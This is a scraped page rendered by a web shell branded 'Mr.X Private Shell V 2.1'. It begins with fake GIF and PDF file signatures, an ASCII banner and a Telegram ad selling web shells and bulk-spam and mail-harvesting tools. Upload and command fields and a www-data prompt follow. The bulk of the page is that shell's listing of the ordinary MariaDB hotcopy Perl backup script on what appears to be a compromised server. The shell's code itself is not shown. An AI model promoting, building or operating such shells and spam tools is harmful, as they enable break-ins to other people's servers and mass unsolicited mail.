GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
usr/bin/mariadb-hotcopy000075500000104235000000000000011103 0ustar00#!/usr/bin/perl

# Copyright (c) 2000, 2017, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; version 2
# of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free
# Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston,
# MA 02110-1335  USA

use strict;
use Getopt::Long;
use Data::Dumper;
use File::Basename;
use File::Path;
use DBI;
use Sys::Hostname;
use File::Copy;
use File::Temp qw(tempfile);

=head1 NAME

mysqlhotcopy - fast on-line hot-backup utility for local MySQL databases and tables

=head1 SYNOPSIS

  mysqlhotcopy db_name

  mysqlhotcopy --suffix=_copy db_name_1 ... db_name_n

  mysqlhotcopy db_name_1 ... db_name_n /path/to/new_directory

  mysqlhotcopy db_name./regex/

  mysqlhotcopy db_name./^\(foo\|bar\)/

  mysqlhotcopy db_name./~regex/

  mysqlhotcopy db_name_1./regex_1/ db_name_1./regex_2/ ... db_name_n./regex_n/ /path/to/new_directory

  mysqlhotcopy --method='scp -Bq -i /usr/home/foo/.ssh/identity' --user=root --password=secretpassword \
         db_1./^nice_table/ user@some.system.dom:~/path/to/new_directory

WARNING: THIS PROGRAM IS STILL IN BETA. Comments/patches welcome.

=cut

# Documentation continued at end of file

# fix CORE::GLOBAL::die to return a predictable exit code
BEGIN { *CORE::GLOBAL::die= sub { warn @_; exit 1; }; }

my $VERSION = "1.23";

my $opt_tmpdir = $ENV{TMPDIR} || "/tmp";

my $OPTIONS = <<"_OPTIONS";

$0 Ver $VERSION

Usage: $0 db_name[./table_regex/] [new_db_name | directory]

  -?, --help           display this help-screen and exit
  -u, --user=#         user for database login if not current user
  -p, --password=#     password to use when connecting to server (if not set
                       in my.cnf, which is recommended)
  -h, --host=#         hostname for local server when connecting over TCP/IP
  -P, --port=#         port to use when connecting to local server with TCP/IP
  -S, --socket=#       socket to use when connecting to local server
      --old_server     connect to old MySQL-server (before v5.5) which
                       doesn't have FLUSH TABLES WITH READ LOCK fully implemented.

  --allowold           don\'t abort if target dir already exists (rename it _old)
  --addtodest          don\'t rename target dir if it exists, just add files to it
  --keepold            don\'t delete previous (now renamed) target when done
  --noindices          don\'t include full index files in copy
  --method=#           method for copy (only "cp" currently supported)

  -q, --quiet          be silent except for errors
  --debug              enable debug
  -n, --dryrun         report actions without doing them

  --regexp=#           copy all databases with names matching regexp
  --suffix=#           suffix for names of copied databases
  --checkpoint=#       insert checkpoint entry into specified db.table
  --flushlog           flush logs once all tables are locked 
  --resetmaster        reset the binlog once all tables are locked
  --resetslave         reset the master.info once all tables are locked
  --tmpdir=#	       temporary directory (instead of $opt_tmpdir)
  --record_log_pos=#   record slave and master status in specified db.table
  --chroot=#           base directory of chroot jail in which mysqld operates

  Try \'perldoc $0\' for more complete documentation
_OPTIONS

sub usage {
    die @_, $OPTIONS;
}

# Do not initialize user or password options; that way, any user/password
# options specified in option files will be used.  If no values are specified
# at all, the defaults will be used (login name, no password).

my %opt = (
    noindices	=> 0,
    allowold	=> 0,	# for safety
    keepold	=> 0,
    method	=> "cp",
    flushlog    => 0,
);
Getopt::Long::Configure(qw(no_ignore_case)); # disambiguate -p and -P
GetOptions( \%opt,
    "help",
    "host|h=s",
    "user|u=s",
    "password|p=s",
    "port|P=s",
    "socket|S=s",
    "old_server",
    "allowold!",
    "keepold!",
    "addtodest!",
    "noindices!",
    "method=s",
    "debug",
    "quiet|q",
    "mv!",
    "regexp=s",
    "suffix=s",
    "checkpoint=s",
    "record_log_pos=s",
    "flushlog",
    "resetmaster",
    "resetslave",
    "tmpdir|t=s",
    "dryrun|n",
    "chroot=s",
) or usage("Invalid option");

# @db_desc
# ==========
# a list of hash-refs containing:
#
#   'src'     - name of the db to copy
#   't_regex' - regex describing tables in src
#   'target'  - destination directory of the copy
#   'tables'  - array-ref to list of tables in the db
#   'files'   - array-ref to list of files to be copied
#   'index'   - array-ref to list of indexes to be copied
#

my @db_desc = ();
my $tgt_name = undef;

usage("") if ($opt{help});

if ( $opt{regexp} || $opt{suffix} || @ARGV > 2 ) {
    $tgt_name   = pop @ARGV unless ( exists $opt{suffix} );
    @db_desc = map { s{^([^\.]+)\./(.+)/$}{$1}; { 'src' => $_, 't_regex' => ( $2 ? $2 : '.*' ) } } @ARGV;
}
else {
    usage("Database name to hotcopy not specified") unless ( @ARGV );

    $ARGV[0] =~ s{^([^\.]+)\./(.+)/$}{$1};
    @db_desc = ( { 'src' => $ARGV[0], 't_regex' => ( $2 ? $2 : '.*' ) } );

    if ( @ARGV == 2 ) {
	$tgt_name   = $ARGV[1];
    }
    else {
	$opt{suffix} = "_copy";
    }
}

my %mysqld_vars;
my $start_time = time;
$opt_tmpdir= $opt{tmpdir} if $opt{tmpdir};
$0 = $1 if $0 =~ m:/([^/]+)$:;
$opt{quiet} = 0 if $opt{debug};
$opt{allowold} = 1 if $opt{keepold};

# --- connect to the database ---
my $dsn;
$dsn  = ";host=" . (defined($opt{host}) ? $opt{host} : "localhost");
$dsn .= ";port=$opt{port}" if $opt{port};
$dsn .= ";mariadb_socket=$opt{socket}" if $opt{socket};

# use mariadb_read_default_group=mysqlhotcopy so that [client] and
# [mysqlhotcopy] groups will be read from standard options files.

my $dbh = DBI->connect("DBI:MariaDB:$dsn;mariadb_read_default_group=mysqlhotcopy",
                        $opt{user}, $opt{password},
{
    RaiseError => 1,
    PrintError => 0,
    AutoCommit => 1,
});

# --- check that checkpoint table exists if specified ---
if ( $opt{checkpoint} ) {
    $opt{checkpoint} = quote_names( $opt{checkpoint} );
    eval { $dbh->do( qq{ select time_stamp, src, dest, msg 
			 from $opt{checkpoint} where 1 != 1} );
       };

    die "Error accessing Checkpoint table ($opt{checkpoint}): $@"
      if ( $@ );
}

# --- check that log_pos table exists if specified ---
if ( $opt{record_log_pos} ) {
    $opt{record_log_pos} = quote_names( $opt{record_log_pos} );

    eval { $dbh->do( qq{ select host, time_stamp, log_file, log_pos, master_host, master_log_file, master_log_pos
			 from $opt{record_log_pos} where 1 != 1} );
       };

    die "Error accessing log_pos table ($opt{record_log_pos}): $@"
      if ( $@ );
}

# --- get variables from database ---
my $sth_vars = $dbh->prepare("show variables like 'datadir'");
$sth_vars->execute;
while ( my ($var,$value) = $sth_vars->fetchrow_array ) {
    $mysqld_vars{ $var } = $value;
}
my $datadir = $mysqld_vars{'datadir'}
    || die "datadir not in mysqld variables";
    $datadir= $opt{chroot}.$datadir if ($opt{chroot});
$datadir =~ s:/$::;


# --- get target path ---
my ($tgt_dirname, $to_other_database);
$to_other_database=0;
if (defined($tgt_name) && $tgt_name =~ m:^\w+$: && @db_desc <= 1)
{
    $tgt_dirname = "$datadir/$tgt_name";
    $to_other_database=1;
}
elsif (defined($tgt_name) && ($tgt_name =~ m:/: || $tgt_name eq '.')) {
    $tgt_dirname = $tgt_name;
}
elsif ( $opt{suffix} ) {
    print "Using copy suffix '$opt{suffix}'\n" unless $opt{quiet};
}
else
{
  $tgt_name="" if (!defined($tgt_name));
  die "Target '$tgt_name' doesn't look like a database name or directory path.\n";
}

# --- resolve database names from regexp ---
if ( defined $opt{regexp} ) {
    my $t_regex = '.*';
    if ( $opt{regexp} =~ s{^/(.+)/\./(.+)/$}{$1} ) {
        $t_regex = $2;
    }

    my $sth_dbs = $dbh->prepare("show databases");
    $sth_dbs->execute;
    while ( my ($db_name) = $sth_dbs->fetchrow_array ) {
	next if $db_name =~ m/^information_schema$/i;
	push @db_desc, { 'src' => $db_name, 't_regex' => $t_regex } if ( $db_name =~ m/$opt{regexp}/o );
    }
}

# --- get list of tables and views to hotcopy ---

my $hc_locks = "";
my $hc_tables = "";
my $hc_base_tables = "";
my $hc_views = "";
my $num_base_tables = 0;
my $num_views = 0;
my $num_tables = 0;
my $num_files = 0;

foreach my $rdb ( @db_desc ) {
    my $db = $rdb->{src};
    my @dbh_base_tables = get_list_of_tables( $db );
    my @dbh_views = get_list_of_views( $db );

    ## filter out certain system non-lockable tables. 
    ## keep in sync with mysqldump.
    if ($db =~ m/^mysql$/i)
    {
      @dbh_base_tables = grep 
        { !/^(apply_status|schema|general_log|slow_log|transaction_registry)$/ } @dbh_base_tables
    }

    ## generate regex for tables/files
    my $t_regex;
    my $negated;
    if ($rdb->{t_regex}) {
        $t_regex = $rdb->{t_regex};        ## assign temporary regex
        $negated = $t_regex =~ s/^~//;     ## note and remove negation operator

        $t_regex = qr/$t_regex/;           ## make regex string from
                                           ## user regex

        ## filter (out) tables specified in t_regex
        print "Filtering tables with '$t_regex'\n" if $opt{debug};
        @dbh_base_tables = ( $negated 
                             ? grep { $_ !~ $t_regex } @dbh_base_tables
                             : grep { $_ =~ $t_regex } @dbh_base_tables );

        ## filter (out) views specified in t_regex
        print "Filtering tables with '$t_regex'\n" if $opt{debug};
        @dbh_views = ( $negated 
                       ? grep { $_ !~ $t_regex } @dbh_views
                       : grep { $_ =~ $t_regex } @dbh_views );
    }

    ## Now concatenate the base table and view arrays.
    my @dbh_tables = (@dbh_base_tables, @dbh_views);

    ## get list of files to copy
    my $db_dir = "$datadir/$db";
    opendir(DBDIR, $db_dir ) 
      or die "Cannot open dir '$db_dir': $!";

    my %db_files;

    while ( defined( my $name = readdir DBDIR ) ) {
        $db_files{$name} = $1 if ( $name =~ /(.+)\.\w+$/ );
    }
    closedir( DBDIR );

    unless( keys %db_files ) {
	warn "'$db' is an empty database\n";
    }

    ## filter (out) files specified in t_regex
    my @db_files;
    if ($rdb->{t_regex}) {
        @db_files = ($negated
                     ? grep { $db_files{$_} !~ $t_regex } keys %db_files
                     : grep { $db_files{$_} =~ $t_regex } keys %db_files );
    }
    else {
        @db_files = keys %db_files;
    }

    @db_files = sort @db_files;

    my @index_files=();

    ## remove indices unless we're told to keep them
    if ($opt{noindices}) {
        @index_files= grep { /\.(ISM|MYI)$/ } @db_files;
	@db_files = grep { not /\.(ISM|MYI)$/ } @db_files;
    }

    $rdb->{files}  = [ @db_files ];
    $rdb->{index}  = [ @index_files ];
    my @hc_base_tables = map { quote_names("$db.$_") } @dbh_base_tables;
    my @hc_views = map { quote_names("$db.$_") } @dbh_views;
    
    my @hc_tables = (@hc_base_tables, @hc_views);
    $rdb->{tables} = [ @hc_tables ];

    $hc_locks .= ", "  if ( length $hc_locks && @hc_tables );
    $hc_locks .= join ", ", map { "$_ READ" } @hc_tables;

    $hc_base_tables .= ", "  if ( length $hc_base_tables && @hc_base_tables );
    $hc_base_tables .= join ", ", @hc_base_tables;
    $hc_views .= ", "  if ( length $hc_views && @hc_views );
    $hc_views .= join " READ, ", @hc_views;

    @hc_tables = (@hc_base_tables, @hc_views);

    $num_base_tables += scalar @hc_base_tables;
    $num_views += scalar @hc_views;
    $num_tables += $num_base_tables + $num_views;
    $num_files  += scalar @{$rdb->{files}};
}

# --- resolve targets for copies ---

if (defined($tgt_name) && length $tgt_name ) {
    # explicit destination directory specified

    # GNU `cp -r` error message
    die "copying multiple databases, but last argument ($tgt_dirname) is not a directory\n"
      if ( @db_desc > 1 && !(-e $tgt_dirname && -d $tgt_dirname ) );

    if ($to_other_database)
    {
      foreach my $rdb ( @db_desc ) {
	$rdb->{target} = "$tgt_dirname";
      }
    }
    elsif ($opt{method} =~ /^scp\b/) 
    {   # we have to trust scp to hit the target
	foreach my $rdb ( @db_desc ) {
	    $rdb->{target} = "$tgt_dirname/$rdb->{src}";
	}
    }
    else
    {
      die "Last argument ($tgt_dirname) is not a directory\n"
	if (!(-e $tgt_dirname && -d $tgt_dirname ) );
      foreach my $rdb ( @db_desc ) {
	$rdb->{target} = "$tgt_dirname/$rdb->{src}";
      }
    }
  }
else {
  die "Error: expected \$opt{suffix} to exist" unless ( exists $opt{suffix} );

  foreach my $rdb ( @db_desc ) {
    $rdb->{target} = "$datadir/$rdb->{src}$opt{suffix}";
  }
}

print Dumper( \@db_desc ) if ( $opt{debug} );

# --- bail out if all specified databases are empty ---

die "No tables to hot-copy" unless ( length $hc_locks );

# --- create target directories if we are using 'cp' ---

my @existing = ();

if ($opt{method} =~ /^cp\b/)
{
  foreach my $rdb ( @db_desc ) {
    push @existing, $rdb->{target} if ( -d  $rdb->{target} );
  }

  if ( @existing && !($opt{allowold} || $opt{addtodest}) )
  {
    $dbh->disconnect();
    die "Can't hotcopy to '", join( "','", @existing ), "' because directory\nalready exist and the --allowold or --addtodest options were not given.\n"
  }
}

retire_directory( @existing ) if @existing && !$opt{addtodest};

foreach my $rdb ( @db_desc ) {
    my $tgt_dirpath = "$rdb->{target}";
    # Remove trailing slashes (needed for Mac OS X)
    substr($tgt_dirpath, 1) =~ s|/+$||;
    if ( $opt{dryrun} ) {
        print "mkdir $tgt_dirpath, 0750\n";
    }
    elsif ($opt{method} =~ /^scp\b/) {
        ## assume it's there?
        ## ...
    }
    else {
        mkdir($tgt_dirpath, 0750) or die "Can't create '$tgt_dirpath': $!\n"
            unless -d $tgt_dirpath;
        my @f_info= stat "$datadir/$rdb->{src}";
        chown $f_info[4], $f_info[5], $tgt_dirpath;
    }
}

##############################
# --- PERFORM THE HOT-COPY ---
#
# Note that we try to keep the time between the LOCK and the UNLOCK
# as short as possible, and only start when we know that we should
# be able to complete without error.

# read lock all the tables we'll be copying
# in order to get a consistent snapshot of the database

if ( $opt{checkpoint} || $opt{record_log_pos} ) {
  # convert existing READ lock on checkpoint and/or log_pos table into WRITE lock
  foreach my $table ( grep { defined } ( $opt{checkpoint}, $opt{record_log_pos} ) ) {
    $hc_locks .= ", $table WRITE" 
	unless ( $hc_locks =~ s/$table\s+READ/$table WRITE/ );
  }
}

my $hc_started = time;	# count from time lock is granted

if ( $opt{dryrun} ) {
    if ( $opt{old_server} ) {
        print "LOCK TABLES $hc_locks\n";
        print "FLUSH TABLES /*!32323 $hc_tables */\n";
    }
    else {
        # Lock base tables and views separately.
        print "FLUSH TABLES $hc_base_tables WITH READ LOCK\n"
          if ( $hc_base_tables );
        print "LOCK TABLES $hc_views READ\n" if ( $hc_views );
    }
    
    print "FLUSH LOGS\n" if ( $opt{flushlog} );
    print "RESET MASTER\n" if ( $opt{resetmaster} );
    print "RESET SLAVE\n" if ( $opt{resetslave} );
}
else {
    my $start = time;
    if ( $opt{old_server} ) {
        $dbh->do("LOCK TABLES $hc_locks");
        printf "Locked $num_tables tables in %d seconds.\n", time-$start unless $opt{quiet};
        $hc_started = time;	# count from time lock is granted

        # flush tables to make on-disk copy up to date
        $start = time;
        $dbh->do("FLUSH TABLES /*!32323 $hc_tables */");
        printf "Flushed tables ($hc_tables) in %d seconds.\n", time-$start unless $opt{quiet};
    }
    else {
        # Lock base tables and views separately, as 'FLUSH TABLES <tbl_name>
        # ... WITH READ LOCK' (introduced in 5.5) would fail for views.
        # Also, flush tables to make on-disk copy up to date
        $dbh->do("FLUSH TABLES $hc_base_tables WITH READ LOCK")
          if ( $hc_base_tables );
        printf "Flushed $num_base_tables tables with read lock ($hc_base_tables) in %d seconds.\n",
               time-$start unless $opt{quiet};

        $start = time;
        $dbh->do("LOCK TABLES $hc_views READ") if ( $hc_views );
        printf "Locked $num_views views ($hc_views) in %d seconds.\n",
               time-$start unless $opt{quiet};

        $hc_started = time;	# count from time lock is granted
    }
    $dbh->do( "FLUSH LOGS" ) if ( $opt{flushlog} );
    $dbh->do( "RESET MASTER" ) if ( $opt{resetmaster} );
    $dbh->do( "RESET SLAVE" ) if ( $opt{resetslave} );

    if ( $opt{record_log_pos} ) {
	record_log_pos( $dbh, $opt{record_log_pos} );
	$dbh->do("FLUSH TABLES /*!32323 $hc_tables */");
    }
}

my @failed = ();

foreach my $rdb ( @db_desc )
{
  my @files = map { "$datadir/$rdb->{src}/$_" } @{$rdb->{files}};
  next unless @files;
  
  eval { copy_files($opt{method}, \@files, $rdb->{target}); };
  push @failed, "$rdb->{src} -> $rdb->{target} failed: $@"
    if ( $@ );
  
  @files = @{$rdb->{index}};
  if ($rdb->{index})
  {
    copy_index($opt{method}, \@files,
	       "$datadir/$rdb->{src}", $rdb->{target} );
  }
  
  if ( $opt{checkpoint} ) {
    my $msg = ( $@ ) ? "Failed: $@" : "Succeeded";
    
    eval {
      $dbh->do( qq{ insert into $opt{checkpoint} (src, dest, msg) 
		      VALUES ( '$rdb->{src}', '$rdb->{target}', '$msg' )
		    } ); 
    };
    
    if ( $@ ) {
      warn "Failed to update checkpoint table: $@\n";
    }
  }
}

if ( $opt{dryrun} ) {
    print "UNLOCK TABLES\n";
    if ( @existing && !$opt{keepold} ) {
	my @oldies = map { $_ . '_old' } @existing;
	print "rm -rf @oldies\n" 
    }
    $dbh->disconnect();
    exit(0);
}
else {
    $dbh->do("UNLOCK TABLES");
}

my $hc_dur = time - $hc_started;
printf "Unlocked tables.\n" unless $opt{quiet};

#
# --- HOT-COPY COMPLETE ---
###########################

$dbh->disconnect;

if ( @failed ) {
    # hotcopy failed - cleanup
    # delete any @targets 
    # rename _old copy back to original

    my @targets = ();
    foreach my $rdb ( @db_desc ) {
        push @targets, $rdb->{target} if ( -d  $rdb->{target} );
    }
    print "Deleting @targets \n" if $opt{debug};

    print "Deleting @targets \n" if $opt{debug};
    rmtree([@targets]);
    if (@existing) {
	print "Restoring @existing from back-up\n" if $opt{debug};
        foreach my $dir ( @existing ) {
	    rename("${dir}_old", $dir )
	      or warn "Can't rename ${dir}_old to $dir: $!\n";
	}
    }

    die join( "\n", @failed );
}
else {
    # hotcopy worked
    # delete _old unless $opt{keepold}

    if ( @existing && !$opt{keepold} ) {
	my @oldies = map { $_ . '_old' } @existing;
	print "Deleting previous copy in @oldies\n" if $opt{debug};
	rmtree([@oldies]);
    }

    printf "$0 copied %d tables (%d files) in %d second%s (%d seconds overall).\n",
	    $num_tables, $num_files,
	    $hc_dur, ($hc_dur==1)?"":"s", time - $start_time
	unless $opt{quiet};
}

exit 0;


# ---

sub copy_files {
    my ($method, $files, $target) = @_;
    my @cmd;
    print "Copying ".@$files." files...\n" unless $opt{quiet};

    if ($method =~ /^s?cp\b/)  # cp or scp with optional flags
    {
	my $cp = $method;
	# add option to preserve mod time etc of copied files
	# not critical, but nice to have
	$cp.= " -p" if $^O =~ m/^(solaris|linux|freebsd|darwin)$/;

	# add recursive option for scp
	$cp.= " -r" if $^O =~ /m^(solaris|linux|freebsd|darwin)$/ && $method =~ /^scp\b/;

	# perform the actual copy
	safe_system( $cp, (map { "'$_'" } @$files), "'$target'" );
    }
    else
    {
	die "Can't use unsupported method '$method'\n";
    }
}

#
# Copy only the header of the index file
#

sub copy_index
{
  my ($method, $files, $source, $target) = @_;
  
  print "Copying indices for ".@$files." files...\n" unless $opt{quiet};  
  foreach my $file (@$files)
  {
    my $from="$source/$file";
    my $to="$target/$file";
    my $buff;
    open(INPUT, "<$from") || die "Can't open file $from: $!\n";
    binmode(INPUT, ":raw");
    my $length=read INPUT, $buff, 2048;
    die "Can't read index header from $from\n" if ($length < 1024);
    close INPUT;
    
    if ( $opt{dryrun} )
    {
      print "$opt{method}-header $from $to\n";
    }
    elsif ($opt{method} eq 'cp')
    {
      open(OUTPUT,">$to")   || die "Can\'t create file $to: $!\n";
      if (syswrite(OUTPUT,$buff) != length($buff))
      {
	die "Error when writing data to $to: $!\n";
      }
      close OUTPUT	   || die "Error on close of $to: $!\n";
    }
    elsif ($opt{method} =~ /^scp\b/)
    {
      my ($fh, $tmp)= tempfile('mysqlhotcopy-XXXXXX', DIR => $opt_tmpdir) or
	die "Can\'t create/open file in $opt_tmpdir\n";
      if (syswrite($fh,$buff) != length($buff))
      {
	die "Error when writing data to $tmp: $!\n";
      }
      close $fh || die "Error on close of $tmp: $!\n";
      safe_system("$opt{method} $tmp $to");
      unlink $tmp;
    }
    else
    {
      die "Can't use unsupported method '$opt{method}'\n";
    }
  }
}


sub safe_system {
  my @sources= @_;
  my $method= shift @sources;
  my $target= pop @sources;
  ## @sources = list of source file names

  ## We have to deal with very long command lines, otherwise they may generate 
  ## "Argument list too long".
  ## With 10000 tables the command line can be around 1MB, much more than 128kB
  ## which is the common limit on Linux (can be read from
  ## /usr/src/linux/include/linux/binfmts.h
  ## see http://www.linuxjournal.com/article.php?sid=6060).
 
  my $chunk_limit= 100 * 1024; # 100 kB
  my @chunk= (); 
  my $chunk_length= 0;
  foreach (@sources) {
      push @chunk, $_;
      $chunk_length+= length($_);
      if ($chunk_length > $chunk_limit) {
          safe_simple_system($method, @chunk, $target);
          @chunk=();
          $chunk_length= 0;
      }
  }
  if ($chunk_length > 0) { # do not forget last small chunk
      safe_simple_system($method, @chunk, $target); 
  }
}

sub safe_simple_system {
    my @cmd= @_;

    if ( $opt{dryrun} ) {
        print "@cmd\n";
    }
    else {
        ## for some reason system fails but backticks works ok for scp...
        print "Executing '@cmd'\n" if $opt{debug};
        my $cp_status = system "@cmd > /dev/null";
        if ($cp_status != 0) {
            warn "Executing command failed ($cp_status). Trying backtick execution...\n";
            ## try something else
            `@cmd` || die "Error: @cmd failed ($?) while copying files.\n";
        }
    }
}

sub retire_directory {
    my ( @dir ) = @_;

    foreach my $dir ( @dir ) {
	my $tgt_oldpath = $dir . '_old';
	if ( $opt{dryrun} ) {
	    print "rmtree $tgt_oldpath\n" if ( -d $tgt_oldpath );
	    print "rename $dir, $tgt_oldpath\n";
	    next;
	}

	if ( -d $tgt_oldpath ) {
	    print "Deleting previous 'old' hotcopy directory ('$tgt_oldpath')\n" unless $opt{quiet};
	    rmtree([$tgt_oldpath],0,1);
	}
	rename($dir, $tgt_oldpath)
	  or die "Can't rename $dir=>$tgt_oldpath: $!\n";
	print "Existing hotcopy directory renamed to '$tgt_oldpath'\n" unless $opt{quiet};
    }
}

sub record_log_pos {
    my ( $dbh, $table_name ) = @_;

    eval {
	my ($file,$position) = get_row( $dbh, "show master status" );
	die "master status is undefined" if !defined $file || !defined $position;
	
	my $row_hash = get_row_hash( $dbh, "show slave status" );
	my ($master_host, $log_file, $log_pos ); 
	if ( $dbh->{mariadb_serverinfo} =~ /^3\.23/ ) {
	    ($master_host, $log_file, $log_pos ) 
	      = @{$row_hash}{ qw / Master_Host Log_File Pos / };
	} else {
	    ($master_host, $log_file, $log_pos ) 
	      = @{$row_hash}{ qw / Master_Host Relay_Master_Log_File Exec_Master_Log_Pos / };
	}
	my $hostname = hostname();
	
	$dbh->do( qq{ replace into $table_name 
			  set host=?, log_file=?, log_pos=?, 
                          master_host=?, master_log_file=?, master_log_pos=? }, 
		  undef, 
		  $hostname, $file, $position, 
		  $master_host, $log_file, $log_pos  );
	
    };
    
    if ( $@ ) {
	warn "Failed to store master position: $@\n";
    }
}

sub get_row {
  my ( $dbh, $sql ) = @_;

  my $sth = $dbh->prepare($sql);
  $sth->execute;
  return $sth->fetchrow_array();
}

sub get_row_hash {
  my ( $dbh, $sql ) = @_;

  my $sth = $dbh->prepare($sql);
  $sth->execute;
  return $sth->fetchrow_hashref();
}

sub get_list_of_tables {
    my ( $db ) = @_;

    my $tables =
        eval {
            $dbh->selectall_arrayref('SHOW FULL TABLES FROM ' .
                                     $dbh->quote_identifier($db) .
                                     ' WHERE Table_type = \'BASE TABLE\'')
        } || [];
    warn "Unable to retrieve list of tables in $db: $@" if $@;

    return (map { $_->[0] } @$tables);
}

sub get_list_of_views {
    my ( $db ) = @_;

    my $views =
        eval {
            $dbh->selectall_arrayref('SHOW FULL TABLES FROM ' .
                                     $dbh->quote_identifier($db) .
                                     ' WHERE Table_type = \'VIEW\'')
        } || [];
    warn "Unable to retrieve list of views in $db: $@" if $@;

    return (map { $_->[0] } @$views);
}

sub quote_names {
  my ( $name ) = @_;
  # given a db.table name, add quotes

  my ($db, $table, @cruft) = split( /\./, $name );
  die "Invalid db.table name '$name'" if (@cruft || !defined $db || !defined $table );

  # Earlier versions of DBD return table name non-quoted,
  # such as DBD-2.1012 and the newer ones, such as DBD-2.9002
  # returns it quoted. Let's have a support for both.
  $table=~ s/\`//g;
  return "`$db`.`$table`";
}

__END__

=head1 DESCRIPTION

mysqlhotcopy is designed to make stable copies of live MySQL databases.

Here "live" means that the database server is running and the database
may be in active use. And "stable" means that the copy will not have
any corruptions that could occur if the table files were simply copied
without first being locked and flushed from within the server.

=head1 OPTIONS

=over 4

=item --checkpoint checkpoint-table

As each database is copied, an entry is written to the specified
checkpoint-table.  This has the happy side-effect of updating the
MySQL update-log (if it is switched on) giving a good indication of
where roll-forward should begin for backup+rollforward schemes.

The name of the checkpoint table should be supplied in database.table format.
The checkpoint-table must contain at least the following fields:

=over 4

  time_stamp timestamp not null
  src varchar(32)
  dest varchar(60)
  msg varchar(255)

=back

=item --record_log_pos log-pos-table

Just before the database files are copied, update the record in the
log-pos-table from the values returned from "show master status" and
"show slave status". The master status values are stored in the
log_file and log_pos columns, and establish the position in the binary
logs that any slaves of this host should adopt if initialised from
this dump.  The slave status values are stored in master_host,
master_log_file, and master_log_pos, corresponding to the coordinates
of the next to the last event the slave has executed. The slave or its
siblings can connect to the master next time and request replication
starting from the recorded values. 

The name of the log-pos table should be supplied in database.table format.
A sample log-pos table definition:

=over 4

CREATE TABLE log_pos (
  host            varchar(60) NOT null,
  time_stamp      timestamp NOT NULL,
  log_file        varchar(32) default NULL,
  log_pos         int(11)     default NULL,
  master_host     varchar(60) NULL,
  master_log_file varchar(32) NULL,
  master_log_pos  int NULL,

  PRIMARY KEY  (host) 
);

=back


=item --suffix suffix

Each database is copied back into the originating datadir under
a new name. The new name is the original name with the suffix
appended. 

If only a single db_name is supplied and the --suffix flag is not
supplied, then "--suffix=_copy" is assumed.

=item --allowold

Move any existing version of the destination to a backup directory for
the duration of the copy. If the copy successfully completes, the backup 
directory is deleted - unless the --keepold flag is set.  If the copy fails,
the backup directory is restored.

The backup directory name is the original name with "_old" appended.
Any existing versions of the backup directory are deleted.

=item --keepold

Behaves as for the --allowold, with the additional feature 
of keeping the backup directory after the copy successfully completes.

=item --addtodest

Don't rename target directory if it already exists, just add the
copied files into it.

This is most useful when backing up a database with many large
tables and you don't want to have all the tables locked for the
whole duration.

In this situation, I<if> you are happy for groups of tables to be
backed up separately (and thus possibly not be logically consistent
with one another) then you can run mysqlhotcopy several times on
the same database each with different db_name./table_regex/.
All but the first should use the --addtodest option so the tables
all end up in the same directory.

=item --flushlog

Rotate the log files by executing "FLUSH LOGS" after all tables are
locked, and before they are copied.

=item --resetmaster

Reset the bin-log by executing "RESET MASTER" after all tables are
locked, and before they are copied. Useful if you are recovering a
slave in a replication setup.

=item --resetslave

Reset the master.info by executing "RESET SLAVE" after all tables are
locked, and before they are copied. Useful if you are recovering a
server in a mutual replication setup.

=item --regexp pattern

Copy all databases with names matching the pattern.

=item --regexp /pattern1/./pattern2/

Copy all tables with names matching pattern2 from all databases with
names matching pattern1. For example, to select all tables which
names begin with 'bar' from all databases which names end with 'foo':

   mysqlhotcopy --indices --method=cp --regexp /foo$/./^bar/

=item db_name./pattern/

Copy only tables matching pattern. Shell metacharacters ( (, ), |, !,
etc.) have to be escaped (e.g., \). For example, to select all tables
in database db1 whose names begin with 'foo' or 'bar':

    mysqlhotcopy --indices --method=cp db1./^\(foo\|bar\)/

=item db_name./~pattern/

Copy only tables not matching pattern. For example, to copy tables
that do not begin with foo nor bar:

    mysqlhotcopy --indices --method=cp db1./~^\(foo\|bar\)/

=item -?, --help

Display help-screen and exit.

=item -u, --user=#         

User for database login if not current user.

=item -p, --password=#     

Password to use when connecting to the server. Note that you are strongly
encouraged *not* to use this option as every user would be able to see the
password in the process list. Instead use the '[mysqlhotcopy]' section in
one of the config files, normally /etc/my.cnf or your personal ~/.my.cnf.
(See the chapter 'my.cnf Option Files' in the manual.)

=item -h, -h, --host=#

Hostname for local server when connecting over TCP/IP.  By specifying this
different from 'localhost' will trigger mysqlhotcopy to use TCP/IP connection.

=item -P, --port=#         

Port to use when connecting to MySQL server with TCP/IP.  This is only used
when using the --host option.

=item -S, --socket=#         

UNIX domain socket to use when connecting to local server.

=item --old_server

Use old server (pre v5.5) commands.

=item  --noindices          

Don\'t include index files in copy. Only up to the first 2048 bytes
are copied;  You can restore the indexes with isamchk -r or myisamchk -r
on the backup.

=item  --method=#           

Method for copy (only "cp" currently supported). Alpha support for
"scp" was added in November 2000. Your experience with the scp method
will vary with your ability to understand how scp works. 'man scp'
and 'man ssh' are your friends.

The destination directory _must exist_ on the target machine using the
scp method. --keepold and --allowold are meaningless with scp.
Liberal use of the --debug option will help you figure out what\'s
really going on when you do an scp.

Note that using scp will lock your tables for a _long_ time unless
your network connection is _fast_. If this is unacceptable to you,
use the 'cp' method to copy the tables to some temporary area and then
scp or rsync the files at your leisure.

=item -q, --quiet              

